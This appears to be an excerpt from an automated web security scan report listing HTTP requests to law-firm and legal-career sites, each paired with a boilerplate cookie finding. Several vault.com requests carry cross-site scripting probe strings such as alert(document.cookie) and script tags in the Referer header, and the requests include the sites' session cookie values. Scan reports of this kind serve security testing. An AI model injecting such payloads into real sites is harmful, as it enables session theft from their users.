GET /newsmedia/awardsrankings/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /newsmedia/fastfacts/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /newsmedia/newspubs/List.aspx HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /newsmedia/newspubs/detail.aspx?news=1779 HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells is advising Citi Infrastructure Investors, o ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /newsmedia/timeline/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /offices/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ourpeople/List.aspx HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /practiceAreas/area.aspx?firmService=1720 HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /practiceareas/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head><meta name="description" content="Hogan Lovells depth of experience, global reach, and compr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ru/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /zh-CHS/ HTTP/1.1 Host: www.hoganlovells.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=1.1295449738.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NavId=0; Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EST&Persists=True; ZoneId=0; NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660; Mode=1; DefaultCulture=en-US; __utma=1.2116759900.1295449738.1295449738.1295449738.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; is_returning=1; __utmc=1; __utmb=1.1.10.1295449738; ASP.NET_SessionId=lpsezm55fyelcw45zjklwoyf; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; SiteId=1039;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /washington%20dc%20law%20firms HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms - www.Info.com</title><link rel="shortcut icon" href="http://gfx.info.com/commo ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011insights.cfm?contentID=52 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D52;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /alumni/Index.cfm?contentID=7 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: BACKLINK=%2CcontentID%3D7;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /com.vault.home.portlets/homeflash802010.xml HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/com.vault.home.portlets/homepage_flash.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
<?xml version="1.0" encoding="utf-8" standalone="no"?> <vaultxml> <bgcolor>FFFFFF</bgcolor> <headertext>What's the key to your career success?</headertext> <contentlist> <listentry> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /com.vault.home.portlets/homepage_flash.swf HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="X-UA-Compatible" con ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/arrow-right-middle.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/backgrounds/blue_gradient_reviews.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/backgrounds/footer_background.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/backgrounds/header-gray.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/blogs/photo-small-1260.jpg HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d%22%3E%3Cscript%3Ealert(1)%3C/script%3E5276a27416&rankings=1®ionId=0/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; _chartbeat2=1wcinl964s8aejot; JSESSIONID=0000PKS73Wmf_IK-VDDZBly2VV1:140i3s34m; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/dotted_separator.gif HTTP/1.1 Host: www.vault.com Proxy-Connection: keep-alive Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
